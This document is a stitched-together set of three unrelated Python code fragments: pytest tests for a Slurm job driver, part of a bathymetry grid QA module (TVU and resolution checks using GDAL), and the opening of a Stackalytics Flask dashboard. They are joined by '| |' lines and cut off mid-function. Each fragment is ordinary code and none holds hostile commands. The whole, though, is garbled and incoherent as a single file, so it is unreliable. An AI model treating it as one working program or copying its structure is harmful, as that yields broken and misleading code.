j1 = driver.create_job(
command="sleep 1",
folder=root,
cores=1,
name="job1",
queue="somequeue",
walltime=timedelta(hours=5),
)
assert j1.status == Job.Status.CREATED
j1.status = Job.Status.SUBMITTED
j1.save()
with pytest.raises(InvalidJobStatus):
driver.submit(j1)
j1.status = Job.Status.CREATED
j1.save()
batch_job_id = 5_207_375
with monkeypatch.context() as m:
sbatch = Mock(return_value=f"Submitted batch job {batch_job_id}")
m.setattr(driver.slurm, "_sbatch", sbatch)
driver.submit(j1)
sbatch.assert_called_once_with(j1.data["batchfile"])
assert j1.status == Job.Status.SUBMITTED
assert j1.batch_job_id == str(batch_job_id)
def test_resubmit_job(driver, state, monkeypatch):
root = Folder.get_root()
j1 = driver.create_job(command="sleep 1", folder=root)
assert j1.status == Job.Status.CREATED
batch_job_id = 5_207_375
sbatch = Mock(return_value=batch_job_id)
monkeypatch.setattr(driver.slurm, "sbatch", sbatch)
driver.submit(j1)
sbatch.assert_called_once_with(j1)
assert j1.status == Job.Status.SUBMITTED
assert j1.batch_job_id == str(batch_job_id)
monkeypatch.setattr(driver.slurm, "sacct", Mock(return_value=[]))
with pytest.raises(InvalidJobStatus):
driver.resubmit(j1)
SAI = SlurmAccountingItem
monkeypatch.setattr(
driver.slurm,
"sacct",
Mock(return_value=[SAI(j1.batch_job_id, Job.Status.FAILED, 0, {})]),
)
bjid2 = 42
sbatch = Mock(return_value=bjid2)
monkeypatch.setattr(driver.slurm, "sbatch", sbatch)
with monkeypatch.context() as m:
# job errors on kill, resubmits anyway
m.setattr(driver, "kill", Mock(side_effect=RuntimeError()))
m.setattr("os.path.exists", Mock(side_effect=[True, False, False]))
m.setattr("os.remove", Mock())
j1 = driver.resubmit(j1)
sbatch.assert_called_once()
assert j1.status == Job.Status.SUBMITTED
assert j1.batch_job_id == str(bjid2) # gets new batch job id
with monkeypatch.context() as m:
m.setattr(driver, "sync_status", Mock()) # disable sync for a second
with pytest.raises(InvalidJobStatus):
driver.resubmit(j1) # stays in SUBMITTED, not accepted
monkeypatch.setattr(
driver.slurm,
"sacct",
Mock(return_value=[SAI(j1.batch_job_id, Job.Status.FAILED, 0, {})]),
)
# will go to failed
bjid3 = 99
sbatch = Mock(return_value=bjid3)
monkeypatch.setattr(driver.slurm, "sbatch", sbatch)
j1 = driver.resubmit(j1)
sbatch.assert_called_once()
assert j1.status == Job.Status.SUBMITTED
assert j1.batch_job_id == str(bjid3)
def test_job_bulk_resubmit(driver, state, monkeypatch):
root = Folder.get_root()
jobs = [
driver.create_job(
command="echo 'begin'; sleep 0.2 ; echo 'end' ; exit 1", folder=root
),
driver.create_job(
command="echo 'begin'; sleep 0.2 ; echo 'end' ; exit 1", folder=root
),
driver.create_job(
command="echo 'begin'; sleep 0.2 ; echo 'end' ; exit 1", folder=root
),
]
other_job = driver.create_job(
command="echo 'begin'; sleep 0.2 ; echo 'end' ; exit 1", folder=root
)
other_job.status = Job.Status.COMPLETED
other_job.save()
jobs[0].status = Job.Status.FAILED
jobs[0].save()
sbatch = Mock(side_effect=[1, 2, 3])
monkeypatch.setattr(driver.slurm, "sbatch", sbatch)
driver.bulk_submit(jobs[1:])
assert sbatch.call_count == 2
for job in jobs[1:]:
job.status = Job.Status.COMPLETED
with open(job.data["stdout"], "w") as f:
f.write("hurz")
job.save()
shutil.rmtree(jobs[0].data["output_dir"])
# we need to prevent driver from actually calling submit
submit = Mock()
remove = Mock(wraps=os.remove)
makedirs = Mock()
with monkeypatch.context() as m:
m.setattr(driver, "submit", submit)
m.setattr(driver.slurm, "sacct", Mock(return_value=[]))
m.setattr(driver, "bulk_kill", Mock(side_effect=RuntimeError))
m.setattr("os.remove", remove)
m.setattr("os.makedirs", makedirs)
driver.bulk_resubmit(jobs)
assert submit.call_count == len(jobs)
remove.assert_has_calls([call(j.data["stdout"]) for j in jobs[1:]], any_order=True)
makedirs.assert_has_calls(
[call(j.data["output_dir"]) for j in jobs[1:]], any_order=True
)
for job in jobs:
job.reload()
assert job.status == Job.Status.CREATED
# bug: all jobs where reset to created. Check this is not the case anymore
other_job.reload()
assert other_job.status != Job.Status.CREATED
def test_resubmit_bulk_invalid_status(driver, state, monkeypatch):
monkeypatch.setattr(driver, "sync_status", Mock())
j1 = driver.create_job(command="sleep 1", folder=state.cwd)
for status in (Job.Status.CREATED, Job.Status.SUBMITTED, Job.Status.RUNNING):
j1.status = status
j1.save()
with pytest.raises(InvalidJobStatus):
driver.bulk_resubmit([j1])
def test_job_bulk_resubmit_no_submit(driver, state, monkeypatch):
root = Folder.get_root()
jobs = [
driver.create_job(
command="echo 'begin'; sleep 0.2 ; echo 'end' ; exit 1", folder=root
),
driver.create_job(
command="echo 'begin'; sleep 0.2 ; echo 'end' ; exit 1", folder=root
),
driver.create_job(
command="echo 'begin'; sleep 0.2 ; echo 'end' ; exit 1", folder=root
),
]
sbatch = Mock(side_effect=[1, 2, 3])
monkeypatch.setattr(driver.slurm, "sbatch", sbatch)
driver.bulk_submit(jobs)
assert sbatch.call_count == 3
for job in jobs:
job.status = Job.Status.COMPLETED
job.save()
bulk_submit = Mock()
with monkeypatch.context() as m:
m.setattr(driver.slurm, "sacct", Mock(return_value=[]))
m.setattr(driver, "bulk_submit", bulk_submit)
driver.bulk_resubmit(jobs, do_submit=False)
assert bulk_submit.call_count == 0
def test_stdout_stderr(driver, state, monkeypatch):
root = Folder.get_root()
j1 = driver.create_job(
command="sleep 1",
folder=root,
cores=1,
name="job1",
queue="somequeue",
walltime=timedelta(hours=5),
)
assert j1.status == Job.Status.CREATED
batch_job_id = 5_207_375
sbatch = Mock(return_value=batch_job_id)
monkeypatch.setattr(driver.slurm, "sbatch", sbatch)
driver.submit(j1)
assert j1.status == Job.Status.SUBMITTED
assert j1.batch_job_id == str(batch_job_id)
stdout = "VALUE VALUE VALUE"
with open(j1.data["stdout"], "w") as fh:
fh.write(stdout)
with driver.stdout(j1) as fh:
assert stdout == fh.read()
with pytest.raises(NotImplementedError):
driver.stderr(j1)
def test_sync_status(driver, monkeypatch):
root = Folder.get_root()
j1 = driver.create_job(command="sleep 1", folder=root)
with monkeypatch.context() as m:
sbatch = Mock(return_value=1)
m.setattr(driver.slurm, "sbatch", sbatch)
assert j1.status == Job.Status.CREATED
batch_job_id = 5_207_375
monkeypatch.setattr(driver.slurm, "sbatch", Mock(return_value=batch_job_id))
driver.submit(j1)
assert j1.status == Job.Status.SUBMITTED
assert j1.batch_job_id == str(batch_job_id)
sacct_return = [
[SlurmAccountingItem(batch_job_id, Job.Status.RUNNING, 0, {})],
[SlurmAccountingItem(batch_job_id, Job.Status.FAILED, 0, {})],
]
sacct = Mock(side_effect=sacct_return)
monkeypatch.setattr(driver.slurm, "sacct", sacct)
j1 = driver.sync_status(j1)
assert j1.status == Job.Status.RUNNING
j1 = driver.sync_status(j1)
assert j1.status == Job.Status.FAILED
def test_bulk_create(driver, state):
root = Folder.get_root()
jobs = driver.bulk_create_jobs(
[{"folder": root, "command": "sleep 1"} for i in range(10)]
)
assert len(jobs) == 10
for job in jobs:
assert job.status == Job.Status.CREATED
def test_bulk_submit(driver, state, monkeypatch):
root = Folder.get_root()
jobs = [
driver.create_job(folder=root, command=f"sleep 0.1; echo 'JOB{i}'")
for i in range(15)
]
assert len(jobs) == 15
for job in jobs:
assert job.status == Job.Status.CREATED
sbatch = Mock(
side_effect=[f"Submitted batch job {i + 1}" for i in range(len(jobs))]
)
monkeypatch.setattr(driver.slurm, "_sbatch", sbatch)
driver.bulk_submit(jobs)
assert sbatch.call_count == len(jobs)
for job in jobs:
assert job.status == Job.Status.SUBMITTED
assert str(job.job_id) == job.batch_job_id
def test_bulk_sync_status(driver, state, monkeypatch):
root = Folder.get_root()
jobs = [
driver.create_job(folder=root, command=f"sleep 0.1; echo 'JOB{i}'")
for i in range(15)
]
assert len(jobs) == 15
for job in jobs:
assert job.status == Job.Status.CREATED
sbatch = Mock(side_effect=[i + 1 for i in range(len(jobs))])
monkeypatch.setattr(driver.slurm, "sbatch", sbatch)
driver.bulk_submit(jobs)
sacct_return = [
"|".join([str(i + 1), "RUNNING", "0:0", "", "", "", ""])
for i in range(len(jobs))
]
sacct = Mock(return_value=sacct_return)
# pretend they're all running now
monkeypatch.setattr(driver.slurm, "_sacct", sacct)
jobs = driver.bulk_sync_status(jobs)
sacct.assert_called_once_with(
jobs=",".join([j.batch_job_id for j in jobs]),
format="JobID,State,ExitCode,Submit,Start,End,NodeList",
noheader=True,
parsable2=True,
starttime=ANY,
_iter=True,
)
for job in jobs:
assert job.status == Job.Status.RUNNING
sacct_return = [
"|".join([str(i + 1), "COMPLETED" if i < 6 else "FAILED", "0:0"] + [""] * 4)
for i in range(len(jobs))
]
sacct = Mock(return_value=sacct_return)
monkeypatch.setattr(driver.slurm, "_sacct", sacct)
jobs = driver.bulk_sync_status(jobs)
sacct.assert_called_once_with(
jobs=",".join([j.batch_job_id for j in jobs]),
format="JobID,State,ExitCode,Submit,Start,End,NodeList",
| |
make them more obvious. We've already
# calculated the pass/fail stats so this won't impact results.
failed_uncertainty_int8_grow = self._grow_pixels(
failed_uncertainty_int8, self.pixel_growth)
# simplify distance is calculated as the distance pixels are grown out
# `ifd.geotransform[1]` is pixel size
simplify_distance = self.pixel_growth * ifd.geotransform[1]
tile_ds = gdal.GetDriverByName('MEM').Create(
'',
tile.max_x - tile.min_x,
tile.max_y - tile.min_y,
1,
gdal.GDT_Float32
)
tile_ds.SetGeoTransform(tile_affine.to_gdal())
tile_band = tile_ds.GetRasterBand(1)
tile_band.WriteArray(allowable_uncertainty, 0, 0)
tile_band.SetNoDataValue(0)
tile_band.FlushCache()
tile_ds.SetProjection(ifd.projection)
tile_failed_ds = gdal.GetDriverByName('MEM').Create(
'',
tile.max_x - tile.min_x,
tile.max_y - tile.min_y,
1,
gdal.GDT_Byte
)
tile_failed_ds.SetGeoTransform(tile_affine.to_gdal())
tile_failed_band = tile_failed_ds.GetRasterBand(1)
tile_failed_band.WriteArray(failed_uncertainty_int8_grow, 0, 0)
tile_failed_band.SetNoDataValue(0)
tile_failed_band.FlushCache()
tile_failed_ds.SetProjection(ifd.projection)
ogr_driver = ogr.GetDriverByName('Memory')
ogr_dataset = ogr_driver.CreateDataSource('shapemask')
ogr_layer = ogr_dataset.CreateLayer('shapemask', srs=ogr_srs)
# used the input raster data 'tile_band' as the input and mask, if not
# used as a mask then a feature that outlines the entire dataset is
# also produced
gdal.Polygonize(
tile_failed_band,
tile_failed_band,
ogr_layer,
-1,
[],
callback=None
)
ogr_simple_driver = ogr.GetDriverByName('Memory')
ogr_simple_dataset = ogr_simple_driver.CreateDataSource(
'failed_poly')
ogr_simple_layer = ogr_simple_dataset.CreateLayer(
'failed_poly', srs=None)
self._simplify_layer(
ogr_layer,
ogr_simple_layer,
simplify_distance)
ogr_srs_out = osr.SpatialReference()
ogr_srs_out.ImportFromEPSG(4326)
transform = osr.CoordinateTransformation(ogr_srs, ogr_srs_out)
for feature in ogr_simple_layer:
# transform feature into epsg:4326 before export to geojson
transformed = feature.GetGeometryRef()
transformed.Transform(transform)
geojson_feature = geojson.loads(feature.ExportToJson())
self.tiles_geojson.coordinates.extend(
geojson_feature.geometry.coordinates
)
ogr_simple_dataset.Destroy()
ogr_dataset.Destroy()
if self.spatial_export:
au = self._get_tmp_file('allowable_uncertainty', 'tif', tile)
tile_ds = gdal.GetDriverByName('GTiff').Create(
au,
tile.max_x - tile.min_x,
tile.max_y - tile.min_y,
1,
gdal.GDT_Float32,
options=['COMPRESS=DEFLATE']
)
tile_ds.SetGeoTransform(tile_affine.to_gdal())
tile_band = tile_ds.GetRasterBand(1)
tile_band.WriteArray(allowable_uncertainty, 0, 0)
tile_band.SetNoDataValue(0)
tile_band.FlushCache()
tile_ds.SetProjection(ifd.projection)
tf = self._get_tmp_file('failed_uncertainty', 'tif', tile)
tile_failed_ds = gdal.GetDriverByName('GTiff').Create(
tf,
tile.max_x - tile.min_x,
tile.max_y - tile.min_y,
1,
gdal.GDT_Byte,
options=['COMPRESS=DEFLATE']
)
tile_failed_ds.SetGeoTransform(tile_affine.to_gdal())
tile_failed_band = tile_failed_ds.GetRasterBand(1)
tile_failed_band.WriteArray(failed_uncertainty_int8, 0, 0)
tile_failed_band.SetNoDataValue(0)
tile_failed_band.FlushCache()
tile_failed_ds.SetProjection(ifd.projection)
sf = self._get_tmp_file('failed_uncertainty', 'shp', tile)
ogr_driver = ogr.GetDriverByName("ESRI Shapefile")
ogr_dataset = ogr_driver.CreateDataSource(sf)
ogr_layer = ogr_dataset.CreateLayer(
'failed_uncertainty', srs=ogr_srs)
# used the input raster data 'tile_band' as the input and mask, if not
# used as a mask then a feature that outlines the entire dataset is
# also produced
gdal.Polygonize(
tile_failed_band,
tile_failed_band,
ogr_layer,
-1,
[],
callback=None
)
tile_ds = None
tile_failed_ds = None
ogr_dataset.Destroy()
self._move_tmp_dir()
def get_outputs(self) -> QajsonOutputs:
execution = QajsonExecution(
start=self.start_time,
end=self.end_time,
status=self.execution_status,
error=self.error_message
)
data = {
"failed_cell_count": self.failed_cell_count,
"total_cell_count": self.total_cell_count,
"fraction_failed": self.failed_cell_count / self.total_cell_count,
}
if self.spatial_qajson:
data['map'] = self.tiles_geojson
if self.failed_cell_count > 0:
percent_failed = (
self.failed_cell_count / self.total_cell_count * 100
)
msg = (
f"{self.failed_cell_count} nodes failed the TVU check this "
f"represents {percent_failed:.1f}% of all nodes within data."
)
return QajsonOutputs(
execution=execution,
files=None,
count=None,
percentage=None,
messages=[msg],
data=data,
check_state=GridCheckState.cs_fail
)
else:
return QajsonOutputs(
execution=execution,
files=None,
count=None,
percentage=None,
messages=[],
data=data,
check_state=GridCheckState.cs_pass
)
class ResolutionCheck(GridCheck):
'''
Determines what areas of the grid satisfy a resolution check. The check
first calculates a feature detection size (fds) on a per pixel basis, two
values for this are calculated above and below a threshold depth. In both
cases the fds value is calculated from the pixels depth and linear equation
parameters provided as input parameters to this check. eg;
fds = Depth Multiplier * depth + Depth Constant
This equation is calculated using different a different Depth Multiplier
and Depth Constant depending on whether the depth at that location is
above of below the threshold.
Once fds has been calculated per pixel a boolean check is performed to find
pixels where the grid resolution is lower than the fds * feature
detection multiplier. If any pixel is false, then the QA check fails.
'''
id = 'c73119ea-4f79-4001-86e3-11c4cbaaeb2d'
name = 'Resolution Check'
version = '1'
# default values taken from IHO - 1a spec
input_params = [
QajsonParam("Feature Detection Size Multiplier", 0.5),
QajsonParam("Threshold Depth", 40.0),
QajsonParam("Above Threshold FDS Depth Multiplier", 0.0),
QajsonParam("Above Threshold FDS Depth Constant", 2.0),
QajsonParam("Below Threshold FDS Depth Multiplier", 0.05),
QajsonParam("Below Threshold FDS Depth Constant", 0.0)
]
def __init__(self, input_params: List[QajsonParam]):
super().__init__(input_params)
self._fds_multiplier = self.get_param(
'Feature Detection Size Multiplier')
self._threshold_depth = self.get_param(
'Threshold Depth')
self._a_fds_depth_multiplier = self.get_param(
'Above Threshold FDS Depth Multiplier')
self._a_fds_depth_constant = self.get_param(
'Above Threshold FDS Depth Constant')
self._b_fds_depth_multiplier = self.get_param(
'Below Threshold FDS Depth Multiplier')
self._b_fds_depth_constant = self.get_param(
'Below Threshold FDS Depth Constant')
self.tiles_geojson = MultiPolygon()
# amount of padding to place around failing pixels
# this simplifies the geometry, and enlarges the failing area that
# will allow it to be shown in the UI more easily
self.pixel_growth = 5
def merge_results(self, last_check: GridCheck):
self.start_time = last_check.start_time
self.total_cell_count += last_check.total_cell_count
self.failed_cell_count += last_check.failed_cell_count
self.tiles_geojson.coordinates.extend(
last_check.tiles_geojson.coordinates
)
self._merge_temp_dirs(last_check)
def run(
self,
ifd: InputFileDetails,
tile: Tile,
depth,
density,
uncertainty,
progress_callback=None):
# run check on tile data
self.grid_resolution = ifd.geotransform[1]
# count of all cells/nodes/pixels that are not NaN in the uncertainty
# array
self.total_cell_count = int(depth.count())
# skip processing this chunk of data if it contains only nodata
if self.total_cell_count == 0:
self.failed_cell_count = 0
return
abs_depth = np.abs(depth)
abs_threshold_depth = abs(self._threshold_depth)
# refer to docs at top of class defn, this is described there
fds = np.piecewise(
abs_depth,
[
abs_depth < abs_threshold_depth,
abs_depth >= abs_threshold_depth
],
[
lambda d: self._a_fds_depth_multiplier * d + self._a_fds_depth_constant,
lambda d: self._b_fds_depth_multiplier * d + self._b_fds_depth_constant
]
)
fds = np.ma.masked_where(np.ma.getmask(depth), fds)
allowable_grid_size = fds * self._fds_multiplier
# The idea of the standard here is that the deeper the water gets the
# less ability you have to pick up features on the seafloor and also
# features become less important the deeper the water gets as under
# keel clearance for ships becomes less of an issue.
failed_resolution = allowable_grid_size < self.grid_resolution
failed_resolution.fill_value = False
failed_resolution = failed_resolution.filled()
failed_resolution_int8 = failed_resolution.astype(np.int8)
# count of cells that failed the check
self.failed_cell_count = int(failed_resolution.sum())
if not (self.spatial_export or self.spatial_export_location):
# if we don't generate spatial outputs, then there's no
# need to do any further processing
return
src_affine = Affine.from_gdal(*ifd.geotransform)
tile_affine = src_affine * Affine.translation(
tile.min_x,
tile.min_y
)
ogr_srs = osr.SpatialReference()
ogr_srs.ImportFromWkt(ifd.projection)
# see notes on density check for more details on the processing performed
# below
if self.spatial_qajson:
# grow out failed pixels to make them more obvious. We've already
# calculated the pass/fail stats so this won't impact results.
failed_resolution_int8_grow = self._grow_pixels(
failed_resolution_int8, self.pixel_growth)
# simplify distance is calculated as the distance pixels are grown out
# `ifd.geotransform[1]` is pixel size
simplify_distance = self.pixel_growth * ifd.geotransform[1]
tile_failed_ds = gdal.GetDriverByName('MEM').Create(
'',
tile.max_x - tile.min_x,
tile.max_y - tile.min_y,
1,
gdal.GDT_Byte
)
tile_failed_ds.SetGeoTransform(tile_affine.to_gdal())
tile_failed_band = tile_failed_ds.GetRasterBand(1)
tile_failed_band.WriteArray(failed_resolution_int8_grow, 0, 0)
tile_failed_band.SetNoDataValue(0)
tile_failed_band.FlushCache()
tile_failed_ds.SetProjection(ifd.projection)
ogr_driver = ogr.GetDriverByName('Memory')
ogr_dataset = ogr_driver.CreateDataSource('shapemask')
ogr_layer = ogr_dataset.CreateLayer('shapemask', srs=ogr_srs)
# used the input raster data 'tile_band' as the input and mask, if not
# used as a mask then a feature that outlines the entire dataset is
# also produced
gdal.Polygonize(
tile_failed_band,
tile_failed_band,
ogr_layer,
-1,
[],
callback=None
)
ogr_simple_driver = ogr.GetDriverByName('Memory')
ogr_simple_dataset = ogr_simple_driver.CreateDataSource(
'failed_poly')
ogr_simple_layer = ogr_simple_dataset.CreateLayer(
'failed_poly', srs=None)
self._simplify_layer(
ogr_layer,
ogr_simple_layer,
simplify_distance)
ogr_srs_out = osr.SpatialReference()
ogr_srs_out.ImportFromEPSG(4326)
transform = osr.CoordinateTransformation(ogr_srs, ogr_srs_out)
for feature in ogr_simple_layer:
# transform feature into epsg:4326 before export to geojson
transformed = feature.GetGeometryRef()
transformed.Transform(transform)
geojson_feature = geojson.loads(feature.ExportToJson())
self.tiles_geojson.coordinates.extend(
geojson_feature.geometry.coordinates
)
ogr_simple_dataset.Destroy()
ogr_dataset.Destroy()
if self.spatial_export:
allowable_grid_size.fill_value = -9999.0
allowable_grid_size = allowable_grid_size.filled()
ar = self._get_tmp_file('allowable_resolution', 'tif', tile)
tile_ds = gdal.GetDriverByName('GTiff').Create(
ar,
tile.max_x - tile.min_x,
tile.max_y - tile.min_y,
1,
gdal.GDT_Float32,
options=['COMPRESS=DEFLATE']
)
tile_ds.SetGeoTransform(tile_affine.to_gdal())
tile_band = tile_ds.GetRasterBand(1)
tile_band.WriteArray(allowable_grid_size, 0, 0)
tile_band.SetNoDataValue(-9999.0)
tile_band.FlushCache()
tile_ds.SetProjection(ifd.projection)
tf = self._get_tmp_file('failed_resolution', 'tif', tile)
tile_failed_ds = gdal.GetDriverByName('GTiff').Create(
tf,
tile.max_x - tile.min_x,
tile.max_y - tile.min_y,
1,
gdal.GDT_Byte,
options=['COMPRESS=DEFLATE']
)
tile_failed_ds.SetGeoTransform(tile_affine.to_gdal())
tile_failed_band = tile_failed_ds.GetRasterBand(1)
tile_failed_band.WriteArray(failed_resolution_int8, 0, 0)
tile_failed_band.SetNoDataValue(0)
tile_failed_band.FlushCache()
tile_failed_ds.SetProjection(ifd.projection)
sf = self._get_tmp_file('failed_resolution', 'shp', tile)
ogr_driver = ogr.GetDriverByName("ESRI Shapefile")
ogr_dataset = ogr_driver.CreateDataSource(sf)
ogr_layer = ogr_dataset.CreateLayer(
'failed_resolution', srs=ogr_srs)
# used the input raster data 'tile_band' as the input and mask, if not
# used as a mask then a feature that outlines the entire dataset is
# also produced
gdal.Polygonize(
tile_failed_band,
tile_failed_band,
ogr_layer,
-1,
[],
callback=None
)
tile_ds = None
tile_failed_ds = None
ogr_dataset.Destroy()
self._move_tmp_dir()
def get_outputs(self) -> QajsonOutputs:
execution = QajsonExecution(
start=self.start_time,
end=self.end_time,
status=self.execution_status,
error=self.error_message
)
data = {
"failed_cell_count": self.failed_cell_count,
"total_cell_count": self.total_cell_count,
"fraction_failed": self.failed_cell_count / self.total_cell_count,
"grid_resolution": self.grid_resolution
}
if self.spatial_qajson:
data['map'] = self.tiles_geojson
if self.failed_cell_count > 0:
percent_failed = (
self.failed_cell_count / self.total_cell_count * 100
)
msg = | |
<gh_stars>0
# Copyright (c) 2013 Mirantis Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import collections
import operator
import os
import time
import flask
from oslo_config import cfg
from oslo_log import log as logging
import six
from stackalytics.dashboard import config
from stackalytics.dashboard import decorators
from stackalytics.dashboard import helpers
from stackalytics.dashboard import kpi
from stackalytics.dashboard import parameters
from stackalytics.dashboard import reports
from stackalytics.dashboard import vault
from stackalytics.processor import config as processor_cfg
from stackalytics.processor import utils
# Application objects ---------
app = flask.Flask(__name__)
app.config.from_object(__name__)
app.config.from_envvar('DASHBOARD_CONF', silent=True)
app.register_blueprint(reports.blueprint)
app.register_blueprint(kpi.blueprint)
LOG = logging.getLogger(__name__)
CONF = cfg.CONF
CONF.register_opts(processor_cfg.CONNECTION_OPTS + config.DASHBOARD_OPTS)
# Handlers ---------
@app.route('/')
@decorators.templated()
def overview():
pass
@app.route('/cncf')
@decorators.templated()
def cncf():
pass
@app.route('/unaffiliated')
@decorators.templated()
def unaffiliated():
pass
@app.route('/widget')
def widget():
return flask.render_template('widget.html')
# AJAX Handlers ---------
def _get_aggregated_stats(records, metric_filter, keys, param_id,
param_title=None, finalize_handler=None):
param_title = param_title or param_id
result = dict((c, {'metric': 0, 'id': c}) for c in keys)
context = {'vault': vault.get_vault()}
if metric_filter:
for record in records:
metric_filter(result, record, param_id, context)
result[getattr(record, param_id)]['name'] = (
getattr(record, param_title))
else:
for record in records:
record_param_id = getattr(record, param_id)
result[record_param_id]['metric'] += 1
result[record_param_id]['name'] = getattr(record, param_title)
response = [r for r in result.values() if r['metric']]
if finalize_handler:
response = [item for item in map(finalize_handler, response) if item]
response.sort(key=lambda x: x['metric'], reverse=True)
utils.add_index(response, item_filter=lambda x: x['id'] != '*independent')
return response
@app.route('/api/1.0/new_companies')
@decorators.exception_handler()
@decorators.response()
@decorators.jsonify('stats')
@decorators.record_filter(ignore=['start_date'])
def get_new_companies(records, **kwargs):
days = int(flask.request.args.get('days') or reports.DEFAULT_DAYS_COUNT)
start_date = int(time.time()) - days * 24 * 60 * 60
result = {}
for record in records:
company_name = record.company_name
date = record.date
if company_name not in result or result[company_name] > date:
result[company_name] = date
response = list(({'name': company_name,
'date': result[company_name],
'date_str': helpers.format_date(result[company_name])})
for company_name in result
if result[company_name] >= start_date)
response.sort(key=lambda x: x['date'], reverse=True)
utils.add_index(response)
return response
@app.route('/api/1.0/stats/companies')
@decorators.exception_handler()
@decorators.response()
@decorators.cached()
@decorators.jsonify('stats')
@decorators.record_filter()
@decorators.aggregate_filter()
def get_companies(records, metric_filter, finalize_handler, **kwargs):
return _get_aggregated_stats(records, metric_filter,
vault.get_memory_storage().get_companies(),
'company_name',
finalize_handler=finalize_handler)
@app.route('/api/1.0/stats/modules')
@decorators.exception_handler()
@decorators.response()
@decorators.cached()
@decorators.jsonify('stats')
@decorators.record_filter()
@decorators.aggregate_filter()
def get_modules(records, metric_filter, finalize_handler, **kwargs):
return _get_aggregated_stats(records, metric_filter,
vault.get_memory_storage().get_modules(),
'module', finalize_handler=finalize_handler)
def get_core_engineer_branch(user, modules):
is_core = None
for (module, branch) in (user.get('core') or []):
if module in modules:
is_core = branch
if branch == 'master': # master is preferable, but stables are ok
break
return is_core
@app.route('/api/1.0/stats/engineers')
@decorators.exception_handler()
@decorators.response()
@decorators.cached()
@decorators.jsonify('stats')
@decorators.record_filter()
@decorators.aggregate_filter()
def get_engineers(records, metric_filter, finalize_handler, **kwargs):
modules_names = parameters.get_parameter(kwargs, 'module')
modules = set([m for m, r in vault.resolve_modules(modules_names, [''])])
def postprocessing(record):
if finalize_handler:
record = finalize_handler(record)
user = vault.get_user_from_runtime_storage(record['id'])
record['core'] = get_core_engineer_branch(user, modules)
return record
return _get_aggregated_stats(records, metric_filter,
vault.get_memory_storage().get_user_ids(),
'user_id', 'author_name',
finalize_handler=postprocessing)
@app.route('/api/1.0/stats/engineers_extended')
@decorators.exception_handler()
@decorators.response()
@decorators.cached(ignore=['metric'])
@decorators.jsonify('stats')
@decorators.record_filter(ignore=['metric'])
def get_engineers_extended(records, **kwargs):
modules_names = parameters.get_parameter(kwargs, 'module')
modules = set([m for m, r in vault.resolve_modules(modules_names, [''])])
def postprocessing(record):
record = decorators.mark_finalize(record)
if not (record['mark'] or record['review'] or record['commit'] or
record['email'] or record['patch']):
return
user = vault.get_user_from_runtime_storage(record['id'])
record['company'] = helpers.get_current_company(user)
record['core'] = get_core_engineer_branch(user, modules)
return record
def record_processing(result, record, param_id):
result_row = result[getattr(record, param_id)]
record_type = record.record_type
result_row[record_type] = result_row.get(record_type, 0) + 1
if record_type == 'mark':
decorators.mark_filter(result, record, param_id, {})
result = {}
for record in records:
user_id = record.user_id
if user_id not in result:
result[user_id] = {'id': user_id, 'mark': 0, 'review': 0,
'commit': 0, 'email': 0, 'patch': 0,
'metric': 0}
record_processing(result, record, 'user_id')
result[user_id]['name'] = record.author_name
response = result.values()
response = [item for item in map(postprocessing, response) if item]
response.sort(key=lambda x: x['metric'], reverse=True)
utils.add_index(response)
return response
@app.route('/api/1.0/stats/distinct_engineers')
@decorators.exception_handler()
@decorators.response()
@decorators.cached()
@decorators.jsonify('stats')
@decorators.record_filter()
def get_distinct_engineers(records, **kwargs):
result = {}
for record in records:
result[record.user_id] = {
'author_name': record.author_name,
'author_email': record.author_email,
}
return result
@app.route('/api/1.0/activity')
@decorators.exception_handler()
@decorators.response()
@decorators.jsonify('activity')
@decorators.record_filter()
def get_activity_json(records, **kwargs):
start_record = int(flask.request.args.get('start_record') or 0)
page_size = int(flask.request.args.get('page_size') or
parameters.DEFAULT_RECORDS_LIMIT)
query_message = flask.request.args.get('query_message')
return helpers.get_activity(records, start_record, page_size,
query_message)
@app.route('/api/1.0/contribution')
@decorators.exception_handler()
@decorators.response()
@decorators.cached(ignore=['metric'])
@decorators.jsonify('contribution')
@decorators.record_filter(ignore=['metric'])
def get_contribution_json(records, **kwargs):
return helpers.get_contribution_summary(records)
@app.route('/api/1.0/companies')
@decorators.exception_handler()
@decorators.response()
@decorators.cached(ignore=['company'])
@decorators.jsonify()
@decorators.record_filter(ignore=['company'])
def get_companies_json(record_ids, **kwargs):
memory_storage = vault.get_memory_storage()
companies = set(company
for company in memory_storage.get_index_keys_by_record_ids(
'company_name', record_ids))
if kwargs['_params']['company']:
companies.add(memory_storage.get_original_company_name(
kwargs['_params']['company'][0]))
return [{'id': c.lower().replace('&', ''), 'text': c}
for c in sorted(companies)]
@app.route('/api/1.0/modules')
@decorators.exception_handler()
@decorators.response()
@decorators.cached(ignore=['module'])
@decorators.jsonify()
@decorators.record_filter(ignore=['module'])
def get_modules_json(record_ids, **kwargs):
module_id_index = vault.get_vault()['module_id_index']
tags = parameters.get_parameter(kwargs, 'tag', plural_name='tags')
# all modules mentioned in records
module_ids = vault.get_memory_storage().get_index_keys_by_record_ids(
'module', record_ids)
add_modules = set([])
for module in six.itervalues(module_id_index):
if set(module['modules']) & module_ids:
add_modules.add(module['id'])
module_ids |= add_modules
# keep only modules with specified tags
if tags:
module_ids = set(module_id for module_id in module_ids
if ((module_id in module_id_index) and
(module_id_index[module_id].get('tag') in tags)))
result = []
for module_id in module_ids:
module = module_id_index[module_id]
result.append({'id': module['id'],
'text': module['module_group_name'],
'tag': module['tag']})
return sorted(result, key=operator.itemgetter('text'))
@app.route('/api/1.0/companies/<company_name>')
@decorators.response()
@decorators.cached()
@decorators.jsonify('company')
def get_company(company_name, **kwargs):
memory_storage_inst = vault.get_memory_storage()
for company in memory_storage_inst.get_companies():
if company.lower() == company_name.lower():
return {
'id': company_name,
'text': memory_storage_inst.get_original_company_name(
company_name)
}
flask.abort(404)
@app.route('/api/1.0/modules/<module_id>')
@decorators.response()
@decorators.cached()
@decorators.jsonify('module')
def get_module(module_id, **kwargs):
project_type = parameters.get_single_parameter(kwargs, 'project_type')
release = parameters.get_single_parameter(kwargs, 'release')
module = helpers.extend_module(module_id, project_type, release)
if not module:
flask.abort(404)
return module
@app.route('/api/1.0/members')
@decorators.exception_handler()
